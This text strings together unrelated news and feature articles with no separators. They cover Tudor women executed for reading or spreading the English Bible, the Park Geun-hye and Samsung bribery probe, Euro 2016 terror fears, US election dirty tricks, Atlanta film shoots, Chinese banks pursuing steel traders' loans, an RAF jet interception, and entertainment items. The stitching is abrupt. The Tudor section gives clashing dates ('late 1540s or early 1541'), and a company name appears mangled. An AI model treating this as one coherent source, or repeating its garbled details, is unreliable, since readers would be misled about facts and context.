Such a legal opinion failed to save the Kent prophetess 's life , since Henry then resolved to proceed against her by Act of Attainder . Nonetheless , the ‘ hypocrite nun ' had proved to be a considerable annoyance . Even Archbishop Cranmer believed that , due to her direct contact with the pope 's ambassadors , as well as Cardinal Wolsey , Archbishop Warham , Bishop Fisher and Thomas More , she had greatly delayed the annulment of the king 's marriage to Catherine of Aragon . Barton was hanged on 20 April 1534 , but she was not the last woman to trouble him in the cause of religion .
The Act for the Advancement of True Religion , which was passed by parliament on 12 May 1543 made it illegal for women below the rank of noblewoman or gentlewoman to read the Bible in English , while those upper class women still permitted to continue , were required to read only in private . Great swathes of Englishwomen were suddenly criminalised ; but many kept on reading either at home or in public .
The Reformation and the dissemination of the scriptures in English had been eye-opening for an entire generation of women . Decades later , at the end of her long life , the merchant 's daughter Rose Hickman would recall that , during the heady days of the 1530s and 1540s , she had learned of Protestantism at her mother 's knee . The elder woman would send secretly for reformist texts from overseas and ‘ used to call me with my 2 sisters into her chamber to read to us out of the same good books very privately for fear of trouble because these good books were then accounted heretical ' . There was danger in such activities , but Englishwomen kept on reading .
Joan Bocher was one such woman . She appears suddenly in the records in the 1540s , when she was already in trouble for her fervent religious beliefs . Her early life is obscure . She had a husband at one time , living with him in the tiny hamlet of Westbere , which lay a few miles from Canterbury in Kent . Even then , thanks to her reading of the Bible and the contact that she had with others who held reformist beliefs , she had become convinced of the new ways . She was certainly well travelled . Perhaps her husband was a merchant , which would account for why she was able to move around more widely in England than others of her class . She was no gentlewoman , but she could read and write and had a good understanding .
Joan did not have to wait for Henry VIII 's Great Bible of 1539 , which was the first authorised English translation . She had already obtained a copy of the ‘ heretical ' Tyndale English New Testament . She became noted as ‘ a great reader of Scriptures ' , and soon was a great disseminator too . Bocher was later charged with being ‘ the principal instrument ' by which Tyndale 's Bibles were distributed when they arrived in England , smuggled in bales of cloth . Her new faith brought her connections to some of the more influential and religiously radical women of the court , and she made herself useful to them : taking up several New Testaments at once , she carefully bound them with string beneath the layers of her dress , before boldly walking into court with her hidden wares , where they were hurriedly distributed .
Joan was right to be covert . England , in the 1530s , was still led by a king who considered himself largely traditional in his beliefs . Once , at Colchester , Joan was required to publicly abjure her faith , returning to the traditional church of her youth . She soon abjured her abjuration .
By the late 1540s or early 1541 , Joan Bocher was living in Frittenden , close to her former parish . She was as bluntly outspoken as ever , declaring on one occasion that ‘ matins and evensong was no better than rumbling of tubs ' . On being evicted by her landlord , she packed up her belongings and made for Canterbury , lodging in the house of the radical John Toftes in the Westgate area of the city . There , she lived amongst many of the king 's most extreme subjects , including the Parson of Hothfield , who claimed that the Virgin was neither the queen of Heaven , not more important than any other woman , being only the ‘ bag ' in which Christ grew . Joan , for her own part , caused trouble when , on Easter morning , she prepared a calf 's head for breakfast – feasting when she should have been fasting . She can only have intended to provoke and in late 1540 or early 1541 she was arrested for heresy .
Joan did not deny her heresy when questioned , declaring in a signed confession that she refuted the miracle of the transubstantiation : the bread and wine of the sacrament were not , she asserted , transformed into the body and blood of Christ . She remained for two years in prison before being released only through the ministrations of Christopher Nevinson , Archbishop Cranmer 's commissary , who probably acted on the instructions of his employer . Even Cranmer found some of Joan 's behaviour ‘ offensive ' , but on this occasion he protected his co-religionist .
Joan was fortunate and spent the rest of Henry VIII 's reign in obscurity . Anne Askew , a woman with whom Joan shared her ‘ nearest friendship ' was less fortunate . This Lincolnshire gentlewoman was thrown out of her home by her husband after ( as she claimed ) ‘ she ‘ fell clearly from all old superstition of papistry , to a perfect belief in Jesus Christ ' . Anne , as a gentlewoman , was legally permitted to read the Bible in English at home , but she provoked outrage when she was found reading the scriptures in Lincoln Cathedral soon afterwards , being surrounded by ‘ three score priests ' . Determined , as she said , ‘ that all men knew my conversation and living in all points ' , she resolved to go to London .
Anne Askew was soon in contact with many of the more radical women at the English court , including the Duchess of Suffolk and the Countess of Hertford . She probably also knew the queen , Catherine Parr . She continued as outspoken as ever in the capital and was , unsurprisingly , arrested in March 1545 , accused of denying the miracle of the sacrament . When interrogated , Anne was cocky , self-assured , bold , quoting the scriptures and evading anything too incriminating . When asked whether she had the spirit of God within her , she answered : ‘ if I had not , I was but a reprobate or cast away ' .
On this occasion , she was eventually released , but she was rearrested in May the following year . At her trial on 18 June 1546 Anne admitted that she did indeed deny the transubstantiation : ‘ as for that ye call your God , is but a piece of bread . For a more proof thereof ( mark it when ye list ) let it lie in the box but three months , and it will be mould , and that it can not be God ' . She was sentenced to burn , but not before being tortured in the Tower for what information she could give on the queen and the other court ladies .
The death of Henry VIII in January 1547 cleared the way for the Protestant regime of Protector Somerset , allowing women to be more open in their faith . For many , such as Catherine Parr and her protégés , the future Elizabeth I and Jane Grey , it was a time of enlightenment , when they could be open about their faith . In an era where there was little concept of religious tolerance , however , the regime change was devastating to some . The Catholic Princess Mary , concerned about the restrictions being placed on her own worship , came close to taking ship to Flanders .
Even Joan Bocher found herself out of step with the new regime . By the late 1540s , she had moved on in her beliefs , holding the radical view ( as Cranmer would put it to her ) ‘ that the Word was made flesh in the Virgin 's belly ; but that Christ took flesh of the Virgin you believe not , because the flesh of the Virgin , being the outward man , was sinfully gotten , and born in sin . But the Word , by the consent of the inward man of the Virgin , was made flesh ' . Joan Bocher had the misfortune – on 2 May 1550 – to become one of only two people burned for heresy under Edward VI .
The swinging pendulum of religious change under the Tudors hit women as much as men . Jane Grey – the Protestant alternative to the Catholic Mary I – was another victim , as were the Protestants who died under Mary I and the Catholics under Elizabeth I . Yet , at the same time , for many it was a time of great discovery . For Rose Hickman , reading quietly in her mother 's chamber for fear of discovery , the publication of the scriptures in English for the first time allowed women ( who were rarely taught Latin or Greek ) to consider and think about religion . For many , it was a revelation .
Follow Elizabeth on Social Media :
Elizabeth 's website : Elizabeth Norton
Twitter : @ ENortonHistory
Facebook : Elizabeth Norton
SEOUL ( Reuters ) - South Korean President Park Geun-hye colluded with a friend to take bribes from Samsung Group aimed at cementing Samsung Chief Jay Y. Lee 's control of the conglomerate , the special prosecutor 's office said on Monday , paving the way for Park to be prosecuted if removed from office .
Special prosecutor Park Young-soo announces the results of their investigation over an influence-peddling scandal involving South Korean President Park Geun-hye , in Seoul , South Korea , March 6 , 2017 . REUTERS/Kim Hong-Ji
The findings of the 70-day probe directly accuse the impeached Park of wrongdoing on several charges , including the bribery conspiracy implicating Samsung .
Lee goes on trial for bribery and embezzlement on Thursday amid a corruption scandal that has rocked South Korea and led to the impeachment .
Park , 65 , has had her powers suspended since her impeachment by parliament in December . Should the Constitutional Court uphold the impeachment , she would become the country 's first democratically elected president to be thrown out of office , triggering an election in Asia 's fourth-largest economy .
A decision is expected as early as this week .
South Korean law does not allow a sitting president to be indicted unless she is accused of treason . No formal charges can be brought against her until she is either removed from office or her term ends as scheduled in late February 2018 .
Her removal from office would subject her to a fresh investigation by state prosecutors .
“ Bribery charges related to the president , and the culture blacklist case ... have been transferred to the prosecutors ' office , ” special prosecutor Park Young-soo told a televised news conference .
The special prosecutor also said the president was instrumental in blacklisting more than 9,000 artists , authors and movie industry professionals and excluding them from government assistance that constituted an abuse of power .
In a statement detailing the findings of its investigation , the special prosecutor 's office said the National Pension Service voted in favor of a merger of two Samsung Group affiliates in 2015 , despite anticipating a 138.8 billion won ( $ 119.87 million ) loss .
CHARGES AGAINST PARK “ FICTION ”
“ Samsung Group vice chairman Lee Jae-yong colluded with others including the corporate strategy office chief Choi Gee-sung to bribe the president and Choi Soon-sil with an aim to receive support for his succession by embezzling corporate funds , ” special prosecutor Park told a televised news conference , referring to the Samsung chief 's Korean name .
Choi is President Park 's long-time confidant .
Lee , 48 , pledged 43 billion won ( $ 37.19 million ) in return for support from Park and Choi for a variety of steps including a merger of two Samsung affiliates in 2015 and the 2016 domestic listing of a loss-making drugmaker Samsung Biologics Cfo Ltd , the special prosecutor said .
Park , Choi and Lee have all denied wrongdoing .
Park 's lawyer said on Monday that the special prosecutor 's charges against her were “ fiction ” and that she did not receive illicit favors from Samsung .
“ Future court proceedings will reveal the truth , ” Samsung said in a statement , reiterating it did not pay bribes or make improper requests seeking favors .
The investigation looked into an influence-peddling scandal involving Park , who was impeached after accusations she had colluded with Choi to pressure big businesses to donate to two foundations set up to back the president 's policy initiatives .
Slideshow ( 2 Images )
The state prosecutor 's office said in a statement that it had re-grouped the team of investigators which indicted Choi in November to take over and “ conduct the probe according to law and principle without prejudice ” .
Lee , a third-generation leader of the Samsung tech giant “ chaebol ” , and four other executives , were last week charged with bribery and embezzlement over the corruption scandal .
Based on the main charges levied against Lee , he could face more than 20 years in prison if convicted .
Jerome Boateng family to stay away from Euro 2016 due to terror threat
Jerome Boateng was part of Germany team during Paris attacks last November
Germany defender Jerome Boateng has revealed his wife and five-year-old twins will not travel to France to watch him play at Euro 2016 due to fears of a terror attack .
Boateng was part of the Germany team playing at the Stade de France in Paris on November 13 when a series of attacks across the city left 130 dead .
Three people died following explosions at the stadium during the friendly match against the French national side .
A few days later , a friendly between Germany and the Netherlands was scrapped at the last minute over a terror threat .
And on Tuesday , fans travelling to Euro 2016 in France were warned by the Foreign Office to be on their guard against terrorists .
On Thursday , June 16 , Germany will make their first return to the Stade de France since the November attacks when they take on Poland in the second of their Euro 2016 Group C fixtures .
The Stade De France is expected to be surrounded by heavy security during the entirety of Euro 2016
`` Each person must decide for himself how to deal with it . I have already done so , '' he told Sport Bild weekly .
`` My family and children will not be coming to the stadium . The risk is simply too big . It 's obviously sad to have to deal with such a question . But too many things have happened in the last few days that makes one reflect .
`` I would like to concentrate fully on football during the Euros , and I would feel much better if my family is not sitting in the stadium . ''
On Tuesday , less than a week after Standard and Poor 's downgraded U.S. credit for the first time in history , a plane circled lower Manhattan with a banner that read : `` Thanks for the downgrade . You should all be fired , '' according to a tweet by AmericanBanker . It has since come out that the stunt was paid for by an unnamed broker from St. Louis , according to Fortune .
But if the patron had gotten her first choice , the plane would have been circling another city center .
`` I originally wanted to fly it over Washington , D.C. , but learned that you ca n't do that , '' she told Fortune anonymously , for fear of losing her job . `` So I chose Wall Street instead , but did n't specifically intend it to fly over S & P . ''
`` She 's not mad at S & P , she 's mad at Washington D.C. , '' a friend of the broker told The New York Observer , `` She called me up to have me talk her out of it , and of course , I did n't , because I think it 's funnier than s * * t . ”
Scare-mongering ads , voter registration forms dumped in the trash and misleading statements on the stump : the list of dirty tricks sullying the US presidential election is seemingly endless .
With the high-stakes race culminating with voting Tuesday , experts warn that the unfortunately typical attempts to keep a rival 's supporters from the polls or sway voters with flat out lies could end up deciding the outcome .
“ If an election is close those kinds of things can matter , ” said Kathleen Jamieson , director of the Annenberg Public Policy Center of the University of Pennsylvania .
“ We 've had the chastening experience of 2000 . And 2004 was close as well . ”
Some of the uglier tactics could end up backfiring , Jamieson said , citing a DVD sent to voters in swing states claiming to have uncovered nude photos of President Barack Obama 's mother in a bondage magazine .
“ The problem when that sort of sleaze is distributed is you 'd have to be a hardcore partisan to believe it . It 's not like they changed anyone 's vote , ” Jamieson told AFP .
“ You run the risk that you alienate more people than you mobilize . ”
False and misleading statements on the stump and in advertisements run the risk of alienating voters by undermining a candidate 's trustworthiness .
But given the “ abysmal ” level of political knowledge among most voters , the payoff often outweighs the risk , said FactCheck.org editor Brooks Jackson .
“ The level of deception or the degree to which candidates stray from the facts or reality has more to do with the closeness of the election and the perception of how high the stakes are than just about anything else , ” he said .
“ I think we can move the needle a little bit , but only by increasing the level of public knowledge . Not by shaming politicians . There 's too much at stake . ”
Republican White House hopeful Mitt Romney recently came under fire from both Democrats and the heads of General Motors and Chrysler for ads that falsely implied an automaker rescued by Obama is now shipping American jobs to China .
The Obama campaign has also told its share of whoppers , including claiming that Romney plans to outlaw all abortions when he has clearly stated his support for exceptions in the case of rape , incest and a threat to the life of the mother .
Fringe presidential candidate Randall Terry , an anti-abortion activist , is able to sidestep decency laws and air gruesome ads depicting aborted fetuses by turning it into protected political speech .
One ad declares that “ a vote for Obama helps Muslims murder Christians and Jews ” after showing images of decapitated and bloodied bodies .
Most of the dirtiest tricks — many of which are illegal — are carried out by third parties . The list of known incidents is long :
– Voters in the crucial swing states of Florida and Virginia reported calls from fraudsters telling them they could cast their ballot by phone .
– The FBI is investigating letters sent to voters in Florida , many of whom were Republican , falsely claiming that election officials were questioning their citizenship .
– The Republican National Committee fired a voter registration firm long dogged by allegations of fraud after reports surfaced in September that it submitted forged forms in Florida , Colorado and Nevada .
– Another Republican contractor , Colin Small , was fired last month after he was caught tossing registration forms from Democrats in Virginia into a dumpster .
– The Democratic National Committee fired Texas staffer Stephanie Caballero after an undercover video showed her giving advice on how to vote in two states .
– The son of Virginia Congressman Jim Moran , a Democrat , resigned after the same muckraker caught him on tape talking about how to cast ballots under someone else 's name .
– Billboards warning “ voter fraud is a felony ” in predominantly African American and Hispanic neighborhoods in the battleground state of Ohio were taken down last month after complaints they were aimed at intimidating voters .
Meanwhile , a conservative group called True the Vote has sparked fears of voter intimidation with its vow to train thousands of volunteers to challenge any “ suspicious ” people at the polls as they seek to ferret out voter fraud .
While tossing out voter registration forms is a serious problem , many dirty tricks do n't have much of an impact on the outcome , according to elections expert Rick Hasen of the University of California , Irvine .
“ What is likely to have a larger impact is changes in laws , especially laws passed by Republican legislatures , which have the potential to moderately suppress Democratic turnout such as cutting back on early voting , making registration more difficult and voter ID laws , ” said Hasen .
Photograph by Myrydd Wells
It 's been another busy month here in the Hollywood of the South , with plenty of new movies and television productions and the return of some old favorites Here 's a roundup of what we saw , where we saw it , and how to know which production you might have just spotted .
New this month , Kevin Hart returns to Atlanta for his new film , Night School ( production code : GED ) . ( But no word as of yet if he 'll organize one of his impromptu 5Ks . ) Night School will follow a group of troublemakers attending night school in order to pass a GED exam . Joining Hart will be Keith David and Tiffany Haddish . We first saw GED signs off of Briarcliff Road on September 13 . The next day more were spotted on Ponce De Leon Avenue at Freedom Parkway . Crews filmed in Midtown on the 21st , and off Chattahoochee Avenue on the 22nd . Yesterday , scenes involving a Porsche were filmed near Atlantic Station on 17th Street .
Coming off of his double Emmy win for Outstanding Lead Actor in a Comedy Series and Outstanding Directing for a Comedy Series , Donald Glover is back home for the long-awaited second season of Atlanta ( MiniM ) . Crews set up shop in Mechanicsville between September 20 and 22 . Also on the 22nd , filming took place at an office building in East Point . On September 25 , signs were spotted leading to Southlake Mall .
And , of course , it would n't be a filming update without at least one Marvel film shooting in our city . Ant-Man and the Wasp ( ML ) , starring Paul Rudd , Evangeline Lilly , Michael Douglas , Laurence Fishburne , and Michelle Pfeiffer , started out September at Clark Atlanta University . On September 9 , signs dotted Ted Turner Driver near Martin Luther King Jr. Drive . Most recently , Ant-Man has been downtown , working on top of Underground Atlanta and in Centennial Olympic Park . Signs have been spotted as far away as the newly christened Georgia State Stadium .
Another new film this month is Netflix 's Nappily Ever After ( NEA ) . Based on the novel by Trisha R. Thomas , Nappily Ever After is a romantic comedy about a woman who leaves her live-in boyfriend after he just wo n't commit . The usual independence and self-discovery follow . The film stars Sanna Lathan , Ernie Hudson , and Ricky Whittle ( who you might recognize as Shadow Moon from Starz 's American Gods . ) The movie started production at the tail end of August , shooting on Deering Road , near Amtrak 's Peachtree Station . The next day , a basecamp was spotted at Peachtree Presbyterian Church on Roswell Road . Signs were spotted between August 30 and 31 at North Avenue and Piedmont Road , leading to a basecamp in northern Midtown . On September 7 , crews worked out of the Porsche Experience Center . On the 14th , filming took place in East Point . Most recently , on September 20 , a basecamp was set up at 11th and Juniper Streets in Midtown .
Last week production began on The Front Runner ( TFR ) , a film about former Colorado Senator Gary Hart and his ill-fated 1988 presidential campaign . While this movie is in town , you could run into Hugh Jackman , Vera Farmiga , Kaitlyn Dever , Sara Paxton , J.K. Simmons , Molly Ephraim , Mike Judge , and Toby Huss . We first saw filming take place downtown , on September 19 , near the Marriott Marquis . Signs were spotted the next day on Ralph McGill Boulevard . More were plopped on Ponce De Leon Avenue and Peachtree Street on the 21st . The day after that , production moved out to Tucker . Since then , shooting has been taking place in Covington .
We 've stolen a new television series ! MTV 's Scream ( SS3 ) , which shot its first two seasons in Louisiana , is now calling the Peach State its home ( and tax haven ) . And accompanying the change in scenery , the series will also have a new cast including Teen Wolf star Tyler Posey and rapper Tyga . For the most part , Scream has been working out of Douglasville this week . On September 21 , however , we did spot SS3 signs in Mechanicsville .
Last month , we teased the start of Dumplin ' ( DHI ) 's production . The Jennifer Aniston film ( based the the Julie Murphy novel ) was busy in late August and September . Before September 9 , production mostly stayed in Jonesboro . On September 15 , a basecamp was set up at the First Christian Church of Atlanta on LaVista Road in Tucker . On the 16th , crews filmed in Marietta . They were back up there , working out of the Cobb County Civic Center , on September 23 .
FOX has a new series filming in Atlanta called The Resident ( TR ) . Starring Matt Czuchry , Manish Dayal , Bruce Greenwood , and Emily VanCamp , the show is a medical drama about a resident 's early days practicing medicine . On both September 7 and September 17 , we saw production in Conyers . On the 18th , filming took place at the Woodruff Arts Center .
BET 's The Quad ( GAMU ) has returned to film its second season around Morehouse College . On September 14 , 15 , and 18 , we saw signs pointing to the campus , which stands in for the fictional Georgia A & M University .
The Uncle Drew ( BUCKETS ) commercial-turned-movie was also seen in Atlanta this month . Filming took place in Conyers on August 22 . The 25th brought signs to the East-West Connector near Austell as well as at Paces Ferry Road and Cumberland Parkway . On September 14 , crews shot downtown near the W Hotel .
CBS 's MacGyver ( EYE ) continued to film its second season into September . On the 9th , Peachtree Station was the locale . Signs were placed off of Peters Street for Castleberry Hill shooting between the 13th and the 14th . Crews moved closer to Georgia State Stadium the next day . Between September 19 and 21 , residential shoots were done in East Cobb . We last saw MacGyver downtown on September 23 .
And also this month , The CW 's Valor ( VLR ) set up shop at Oglethrope University on September 14 . Step Up : High Water ( SUP ) signs were seen in Conyers on August 28 . FOX 's The Gifted ( HVN ) shot near Atlantic Station on the 9th . Star ( SOS ) was on the Westside at the end of August .
@ olv @ ATLWOOD411 Someone posted a photo from Valor set on Reddit Atlanta group . pic.twitter.com/634qg3GbHa — CJ ( @ cjmisc2 ) August 30 , 2017
And finally this month , we 've got a new trailer for The Walking Dead ‘ s upcoming eighth season . The sneak peak seemingly puts Maggie in a leadership role on par with Rick , which should be no surprise to readers of the comics . With the show now set squarely in the All Out War comic book arc , expect more fighting , action , and explosions galore . We also know that arc will conclude this season , so it 's safe to assume Georgia 's biggest show will have its biggest season yet trying to fit in one of the most celebrated stories of the comic series into just 16 episodes . Do n't miss the season premiere on October 22 .
SHANGHAI/HONG KONG ( Reuters ) - China 's banks are coming after the country 's steel traders , hauling executives into court to chase down loans that some traders said they did n't initially need and ca n't now repay .
An employee checks on a steel product at a steel production factory in Wuhan , Hubei province in this August 2 , 2012 file photo . China 's banks are coming after the country 's steel traders , hauling executives into court to chase down loans that some traders said they did n't initially need and ca n't now repay . The heavy push to recover the loans is another sign of strain on China 's financial system at a time when the country 's leaders are contemplating another round of stimulus to boost the economy , and when banks are worried about bad debts piling up . REUTERS/Stringer/Files
The heavy push to recover the loans is another sign of strain on China 's financial system at a time when the country 's leaders are contemplating another round of stimulus to boost the economy , and when banks are worried about bad debts piling up .
The battle between the banks and steel traders also exposes flaws in the 4 trillion ( $ 629 billion ) stimulus round in 2008 , and offers a warning to those calling for pumping more money into the system . At that time , Chinese banks threw money at the steel trade - a crucial cog in supplying the country 's massive construction and infrastructure growth .
But those steel loans , after offering a quick fix , became excessive , poorly managed , or a combination of the two . Government officials insisted more money was needed to prop up the industry . Steel executives said the money flow was too heavy , and they had to put the money to work in real estate and the stock market .
“ After the financial crisis , when the government released its stimulus , banks begged us to borrow money we did n't need , ” Li Huanhan , the owner of Shanghai Shunze Steel Trading , told a judge at a recent hearing . “ We had nothing to do with the money , so we turned to other investments , like real estate . ”
PLUSH APARTMENTS
While some loans did go towards equipment and expansion , executives admit money was also used for pet property projects , plush apartments and stock market bets .
By the end of last year , China 's steel industry had a total debt burden of $ 400 billion - around the size of South Africa 's economy . Some of China 's leading mills alone owe 200-300 billion yuan ( $ 32- $ 47 billion ) , according to the China Iron and Steel Association .
The aggressive tack by China 's lenders , many of which are state-controlled , comes as pressure builds inside a stretched financial system . Results at China 's big banks show profit growth is at its weakest since the global financial crisis , while bad loans rose for a third straight quarter to 456.5 billion yuan ( $ 71.8 billion ) by June , the China Banking Regulatory Commission said this month .
Steel traders are unlikely to be helping the bad loan issue , with Shanghai steel futures having almost halved from their 2009 highs to below 3,400 yuan ( $ 540 ) a metric ton ( 1.1023 ton ) .
As the steel market turned - a victim of crippling over-capacity , heavy debt and sliding prices - alarm bells sounded among banks and regulators about the risk of lending to the industry . In June , after months of cajoling , banks were ordered to clamp down on new lending to steel traders .
Steel industry executives complain the banks went overboard .
“ Banks should consider the greater good and not just focus on protecting their own interests , ” said Xiao Zhicheng , head of the Zhouning Chamber of Commerce that overlooks Shanghai 's steel trading industry 's interests . “ Instead of pumping in more blood to save the patient , it 's choosing to draw more blood . ”
TAKEN TO COURT
In one Shanghai courtroom , steel trading firm boss Li tries to fend off a fed-up lender . China Minsheng Bank , the country 's eighth-biggest lender , is trying to recover 3 million yuan ( $ 472,100 ) of loans it made to the trading firm .
When the bank recalled the loan in June , Li tried to sell two Shanghai apartments she had used as collateral . In a flat property market , she came up empty-handed .
Her plea for more time to repay is one of more than 20 court cases Chinese banks have taken against steel traders . The targets tend to be mainly smaller trading firms with fewer than 50 employees , as the larger state-backed steel firms have more cash reserves .
These traders are mainly based in and around Shanghai , a tight-knit community drawn from Zhouning in the southern province of Fujian . At its peak in 2009 , some 12,000 steel trading companies were scattered across the city , accounting for close to 3 percent of Shanghai 's GDP , according to the local business chamber .
By some estimates , the number of steel traders has fallen by half , as steel prices crumpled in the third quarter of 2011 .
“ The court cases you see are usually when things get desperate , ” said a loans official at a Shanghai branch of Bank of Communications , who asked not to be named because of the sensitivity of the subject . “ We 've had people go missing . Some have fled overseas , while others just take on a new identity and move somewhere else . ”
The owner of one of China 's biggest steel trading firms , Yizhou Group , skipped the country with his wife and children after piling up about 1 billion yuan ( $ 157 million ) in loans to banks including Bank of Communications , the official said .
Calls to Yizhou were not answered .
In the Shanghai courtroom , lawyers for Minsheng Bank told Li after the hearing that banks were desperate to recall loans as they had heard of some borrowers going missing with tens of millions of yuan still owed .
“ One trader fled to Australia after borrowing 23 million yuan , while others used their property as collateral to several banks at the same time “ Li said , recounting what she 'd heard from a lawyer . “ So banks are very cautious and taking immediate action against borrowers if they do n't repay . ”
Another steel trader said banks promised fresh loans once existing loans had been repaid , but then withdrew credit lines .
“ Some banks lied to us that they will give out new loans immediately after we repay the old ones , but they never really did . They just shut down the credit lines after they got the money back , ” said a Fujian trader surnamed Xiao from a small Shanghai trading firm with just eight employees .
Some traders resorted to finding private lending at a much higher cost so they could pay back bank loans , in the hope of getting new loans from the banks - leaving them mired in expensive debt when the banks pulled the plug .
“ The banks have taken a tougher stance this year and not only required company assets to be used as collateral but also required the borrowers to use their own property as collateral , ” said Xiao .
HIGH RISK , HIGH RATES
For the banks , lending to steel traders was highly profitable while it lasted .
China Minsheng charged interest rates of up to 24 percent a year to small- and medium-sized trading firms , according to some in the industry - four times the government-set lending rate .
Bankers say the higher rates they charge are a direct response to the higher risk profile the steel traders carry , and not a single Minsheng loan to steel traders can be called a non-performing loan under China 's four-tier classification system , said Shi Jie , assistant to Minsheng Bank 's president .
“ The steel trading sector is a particularly high-risk sector , ” Shi said . “ We 've been very carefully controlling our risks there , and working with borrowers to come to a reasonable agreement if there are problems . ”
In China , a loan is only classified as non-performing if it is overdue for more than 90 days and the borrower has missed interest payments . Otherwise , troubled loans can be classified under a different category known as “ special mention ” loans , or they can be called “ overdue ” .
Domestic steel prices rose by 25 percent in April-September 2009 before prices slumped . While the industry rode the price spike , bank loans offered a route to investing outside the industry .
The most common loan method was through a letter of credit , where banks paid for a trader 's purchase and then gave the trader 3-12 months to repay . That allowed traders a window where they could sell the goods and use the proceeds to invest .
Executives say they could n't refuse the money coming in , and the cash did sometimes go into real estate or even ‘ shadow banking ' , where they would take the loan and lend it to another party at a higher rate .
FLIGHT , SUICIDES
Bank of China said loans to industries at risk of overcapcity , such as steel and shipbuilding , made up less than 4 percent of its total loans and had a bad debt ratio lower than its overall loan book .
“ We 're looking to cut our exposure to industries at risk of overcapacity , ” the bank 's president Li Lihui said . “ Internally , we are raising our own risk control measures and working with clients to cut our risk exposure . ”
Shanghai Gangmin Metals , which borrowed from banks including China Construction Bank , said most of the money was used to pay for steel supplies , though it did have other investments .
“ Money obviously needs to be put to work ... you ca n't let it sit in a bank account , ” said the company 's general manager Su Cheng . “ Ultimately , we think we 'll be able to reach a reasonable agreement with the banks . We just need more time . ”
Many of Su 's peers are n't so confident .
Slideshow ( 2 Images )
Reports of steel traders fleeing China are becoming more widespread , as are local media articles of indebted executives committing suicide .
Ratings agency Fitch said last week that China 's steel sector continued to suffer from oversupply and weak prices could persist through the first quarter of 2013 . China 's biggest steelmaker Baoshan Iron and Steel has predicted a “ most difficult ” third-quarter .
“ There 's good reason for the banks ' lack of confidence in steel traders , ” said Arthur Kwong , head of Asia Pacific Equities at BNP Paribas Investment Partners in Hong Kong , which has total assets under management of $ 640 billion globally . “ When you have an industry where people run away after falling behind on their loans , that does n't inspire a lot of people . ”
Image copyright Andy Longhurst
RAF Typhoon jets intercepted a passenger flight and diverted it to Stansted Airport following a suspected `` hoax '' security alert .
The RAF said its quick reaction alert Typhoon aircraft were deployed on Wednesday morning and safely escorted the plane to the airport , near London .
Flights were temporarily grounded at Stansted but have since resumed .
Ryanair said the flight from Kaunas in Lithuania to Luton was diverted `` in line with procedures '' .
'Bomb threat '
One passenger , Jonathan Zulberg , said when passengers boarded the flight they saw fire engines and a police car but were not told about a threat being made .
Image copyright @ zulu/wooloo/PA
The flight was delayed for up to 40 minutes , he said , and he was told by a stewardess that a bomb threat had been made in Lithuania .
Mr Zulberg said the captain announced that a bomb threat had been made after the plane landed in the UK .
He said : `` When I heard I was pretty surprised the plane was allowed to take off . ''
A sonic boom could be heard in Suffolk after the Typhoon aircraft were authorised to travel at supersonic speed for the operation , the RAF said .
The aircraft are kept on high alert and can take off `` within minutes '' from RAF Coningsby and RAF Lossiemouth to defend UK airspace .
Stansted is a designated airport for dealing with hijacks and major security alerts .
Flights were briefly held earlier , the airport said , but it is now open and operating normally .
London airspace remains open , the National Air Traffic Control Service confirmed .
Image copyright @ zulu/wooloo/PA
Image copyright @ zulu/wooloo/PA
Essex Police said it had completed investigating the incident and confirmed it had not found anything suspicious .
A Ryanair spokesman said the plane landed normally and passengers are being transferred to Luton by coach .
EXCLUSIVE : Here 's a smart way to remake a hit comedy . Paramount Players has signed Empire ‘ s Taraji P. Henson to star in What Men Want , a comedy inspired by the 2000 Nancy Meyers hit romantic comedy What Women Want . The studio is fast tracking the film , and has set it for release January 11 , 2019 .
The original starred Mel Gibson as a confident chauvinistic male who suddenly acquires the ability to hear what the women around him are really thinking . The new version follows a female sports agent ( Henson ) who has been constantly boxed out by her male colleagues . When she gains the power to hear men 's thoughts , she is able to shift the paradigm to her advantage as she races to sign the NBA 's next superstar .
The film will be produced by Will Packer and James Lopez and Henson will executive produced .
Henson , who last starred in Hidden Figures , is repped by UTA and manager Vincent Cirrincione .
Star Trek Online is proud to announce the arrival of Walter Koenig in the game ! He 'll be taking Pavel Chekov into a new frontier , joining forces with Captains as they strive to keep the galactic timeline safe and secure .
Things have changed in our timeline for Chekov since the incident onboard the Enterprise-B and the loss of Captain Kirk . He 's been promoted to Captain , and has joined the ranks of the temporal agents , where he 'll play a key role in several missions .
As someone who grew up in the ‘ 80s watching TOS weekday afternoons on syndicated TV ; I always found Chekov to be young , inquisitive , and humorous . He reminded me of Davy Jones from The Monkees , another show I watched then . Years later , I learned that a resemblance to Jones played a big role in the casting of Walter Koenig as Chekov !
Indeed , Gene Roddenberry wanted the character of Chekov to appeal to the younger members of their audience – and he certainly did . His hairstyle and look was definitely akin to what you would see amongst young people during the late sixties . But his appeal went beyond good looks . Chekov became a staple of the show – he was an amiable young man from Russia whose good intentions sometimes landed him in some trouble .
Chekov 's youthful appearance and full hair were challenging because finding a “ resting face ” was difficult . We poured over references from the various appearences he had made in TOS , as well as the movies of the Wrath of Khan era ( TWOK ) . In the TOS series , we often found him smiling or joking around . In the TWOK movies , he had more of a serious tone ( especially when under the control of Khan himself ) . We did n't want to make him too happy nor too intense . We settled on a resting face of slight concern and readiness . This would help convey the attitude we wanted him to show while interacting in our game .
One of the things we knew going in was that we would see Chekov as a young ensign as well as an older captain . To this end , we made sure to create his face in stages – so that adding slight age lines was easier . In games , much like film – adding age to a character can be a tricky situation . We did n't want to make an entirely new head , but add to the existing younger face we had already made . Furthermore , we kept the age-specific features to a minimum because it 's often very easy to go overboard with them – resulting in a less-than-ideal look for the character . We certainly want our characters as great-looking as they were on the show !
Chekov remains one of our most prominent icons in the TOS experience . We had a lot of fun making him ! Known for his analytical skill as well as his iconic charm ; we hope players will appreciate his addition to the vast and amazing universe of Star Trek Online .
Discuss in the forums
Actress Olivia Munn is venturing into producing with a first-look deal at CBS Television Studios . Under the 18-month pact , which does not include an acting component , Munn will develop and executive produce series projects for the studio . She is in the process of hiring a development executive who will work with her .
“ I 'm excited to have found a common vision with CBS Television Studios and their executives and looking forward to developing exciting and creative new shows , ” Munn said . “ This is a dream come true . ”
Munn , repped by Dave Fleming at newly formed Atlas Artists , CAA and attorney Jamie Mandelbaum , co-stars on the third and final season of Aaron Sorkin 's HBO series The Newsroom . She will next be seen in the art-heist comedy Mortdecai alongside Johnny Depp , Gwyneth Paltrow and Ewan McGregor , and recently wrapped filming Universal 's Ride Along 2 .
